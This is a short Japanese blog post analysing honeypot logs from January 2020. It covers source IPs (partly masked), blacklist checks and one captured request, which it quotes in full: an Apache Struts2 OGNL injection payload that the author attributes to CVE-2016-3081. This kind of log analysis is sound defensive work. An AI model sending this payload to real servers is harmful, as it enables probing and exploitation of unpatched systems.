ハニポのログ解析-20200105to20200113
はじめに
2020年になり一度からしたハニポを再開しモチベ維持のためブログを書くことにした 以上、次から解析結果
アクセス元と総数について
総アクセス数:404件
トップ3が下のような感じになる。 こういう時にどうするのがベストなのか不明なのでマスクする
IPアドレス | 回数 |
---|---|
xxx.37.213.98 | 60 |
xxx.101.0.209 | 21 |
xxx.186.19.221 | 11 |
多かった上二つはもうちょい解析する。 便宜上、上から①と②と③で使い分けることにする
Aguseにかけてみる
Aguseはブラックリスト判定を持つためその結果がどうなったかを記載する
IP | 国 | 判定 |
---|---|---|
① | 中国 | 2つでCAUTION判定 |
② | ロシア | 2つでCAUTION判定 |
③ | 中国 | 2つでCAUTION判定 |
CAUTION判定が出たものはいずれも同じブラックリスト(The spamhaus project,CBL)で判定された。
トップのアクセスのペイロードを確認する
基本的にはGETアクセスのためbotであると思われるが、一部長いペイロードがあり、それを確認するとApache Struts2への攻撃であった。
GET //#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)?(#req=@org.apache.struts2.ServletActionContext@getRequest(),#wr=#context[#parameters.obj[0]].getWriter(),#wr.println(#req.getRealPath(#parameters.pp[0])),#wr.flush(),#wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=/ HTTP/1.1 Host: xxx.xxx.xxx.xxx Connection: keep-alive Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.12.4 Content-type: application/x-www-form-urlencoded
Struts2でOGNLを用いた脆弱性は調べてみるとCVE-2016-3081やCVE-2017-5638,CVE-2018-11776があります。 CVE-2017-5638はContent-Typeにペイロードをいれ、CVE-201-11776はstrut2-showcaseがターゲットになるため これはCVE-2016-3081の攻撃とみていいと思う。
ggってみると下記の記事に出くわす。下記の記事のファイルアップロードと似ている。
Struts2 vulnerability analysis and how to prevent _java in advance
疲れたのでここまで。